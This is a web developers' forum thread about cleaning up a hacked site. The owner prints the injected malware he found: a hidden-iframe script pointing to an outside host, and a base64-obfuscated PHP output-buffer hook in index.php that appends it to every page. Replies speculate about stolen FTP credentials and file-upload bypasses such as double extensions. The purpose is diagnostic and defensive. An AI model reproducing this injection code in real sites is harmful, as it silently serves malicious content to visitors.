Injected Malware

[eluser]CocoMansur[/eluser]
Recently i encountered a Malware, a script was injected on our website

Code:

[removed][removed]('<style>.vb_style_forum {filter:
alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div
class="vb_style_forum"><iframe height="150" width="200"
src="http://vidintex.com/includes/class.pop.php"&gt;&lt;/iframe></div>');[removed]

bad for me i wasn't able to have a clean back-up of our whole website. so i did was download all the files in public_html/ then scanned it with Kaspersky av, treats were detected and cleaned, i also made a string search regarding the script and found 3 .js files that has that script and also deleted it. scanned again with an AV and it's now clean.

uploaded the whole files to the web server and everything seems fine, but then i noticed there is gap at the bottom of the page, i checked the source code and found out that a script was still appended at the bottom of the page, after the </html> tag.

i did a string search again with the files but the script was not found, then i did a manual search and noticed index.php has an injected code

Code:

ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vdmlkaW50ZXguY29tL2luY2x1ZGVzL2NsYXNzLnBvcC5waHAiPjwvaWZyYW1lPjwvZGl2PicpOzwvc2NyaXB0Pg==');}

I deleted the code and the appended script at the page is now gone. any ideas how they managed to inject that code?

anyways i also posted this in-case someone might have this same problem in the future.

[eluser]skunkbad[/eluser]
Usually that kind of code is injected by hackers that got your FTP credentials through a virus on your computer or one on any network where you used plain FTP. Even if another computer on your network is infected, you will probably have your website hacked again.

[eluser]boltsabre[/eluser]
FTP sounds like the culprit, normally is.

Also (I think, but I'm not the worlds best hacker), if you have a file upload part on your site (ie, profile image upload) that isn't secure they could have uploaded a malicious php script that has opened the infected files and written that code into them. In which case cleaning them up like you have more then likely wont fix the problem, all the hacker has to do is call that script again and it will write the code back in.
Do you have file upload? If so, when user upload the file do you rename it to something very random and store that in the DB? If it's just an image uploader do you redraw the image? If you're not familiar with file upload security risks (and they are BIG) I'd research them. Interesting stuff what these sneaky buggers can do! You can create a php file and call it myfilename.php.jpg and it will pass many image upload validation scripts, yet execute as php, it's called a "double extension" injection. Or hiding php (js?) in a files meta data, and when the file is called/loaded it will execute it. Grrrrr.....

[eluser]jojo777[/eluser]
This topic can be very useful for people like me, I'm trying to understand how to avoid that kind of input from users, uploading php as jpeg or upload images with php code inside them.

How can we avoid this kind of situations??

I Googled and only found common controls like check the extension of the file but its not sufficient, I would like to know what consist redraw image and how do it.

In addition of this situation, also CSRF or whatever I even dont knew about their existence O_O

Thanks!

Sorry if I made mistakes with my english

[eluser]Unknown[/eluser]
I had a similar problem yesterday, the code was injected into all index.html and index.php files through out the web root folder including my EE system folder. There is was no upload form, yet the host insisted on blaming EE for a bad script or something. Is this likely the case. Or do you think the 4 year old windows NT webserver is the problem?

[eluser]InsiteFX[/eluser]
you need to chmod your index.php file to 644 read only!